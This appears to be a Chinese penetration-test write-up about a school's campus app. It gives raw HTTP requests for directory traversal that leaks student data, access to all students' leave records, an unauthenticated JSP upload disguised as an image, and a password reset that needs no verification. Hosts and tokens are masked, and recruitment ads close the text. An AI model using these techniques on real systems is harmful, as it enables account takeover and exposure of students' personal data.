在对目标进行目录扫描时扫到/oa/目录可以进行目录遍历日志文件
在日志文件中可以看到学生敏感信息
打厚码
在学校官网查看到学校的校园APP 可以使用上面泄漏的学号和身份证后6位登录到系统中。
个人请假信息越权
抓取数据包,修改请求数据,返回全校学生请假信息
POST /api/oa/xxx/list?token=xxxx HTTP/1.1
Content-Type: application/json;charset=utf-8
User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; MI 9 Build/PQ3A.190705.11211812)
Host: xxxxxx
Connection: close
Accept-Encoding: gzip, deflate
Content-Length: 40
{"page":{"currPage":1,"pageSize":100,},}
修改数据包测试
未授权-任意文件上传
头像更换处 上传文件
POST /api/file/upload HTTP/1.1
Host: xxxxx
Content-Length: 189
User-Agent: Mozilla/5.0 (Linux; Android 9; MI 9 Build/PQ3A.190705.11211812; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/91.0.4472.114 Mobile Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryaAZK16iHBfTCIGBa
Accept: */*
Origin: xxxxx
X-Requested-With: com.goaltall.superschool.student.activity
Referer: xxxxx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
------WebKitFormBoundaryaAZK16iHBfTCIGBa
Content-Disposition: form-data; name="file"; filename="h4.jsp"
Content-Type: image/jpeg
123
------WebKitFormBoundaryaAZK16iHBfTCIGBa--
密码修改
小程序登录处,忘记密码
下一步,点击修改手机号,任意手机号即可,无任何验证,通过抓包也可以获取管理员手机号,或者进行验证码爆破,4位验证码无任何校验
输入新手机号
重置密码
POST /api/auth/user/getmsg/code?idCard=xxxx&phoneNum=xxxx&type=1 HTTP/1.1
Content-Type: application/json;charset=utf-8
User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; MI 9 Build/PQ3A.190705.11211812)
Host: xxxx
Connection: close
Accept-Encoding: gzip, deflate
Content-Length: 0直接跳转重置密码
管理员账号绑定手机号也可以获取到
HVV招聘:投递到-->
https://send2me.cn/Ubbozd6R/S6-vFqExvjv4EA考证咨询:全网最低最优惠报考NISP/CISP/CISSP/PTE/PTS/IRE/IRS等证书,后台回复“好友”加V私聊。
【2024HW】持续招聘中:多个优质HW项目(有新增)
浅谈一次省护红队的经历
[韭]第一次参加护网行动要注意什么??
原文始发于微信公众号(WIN哥学安全):记一次对某学校APP渗透
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论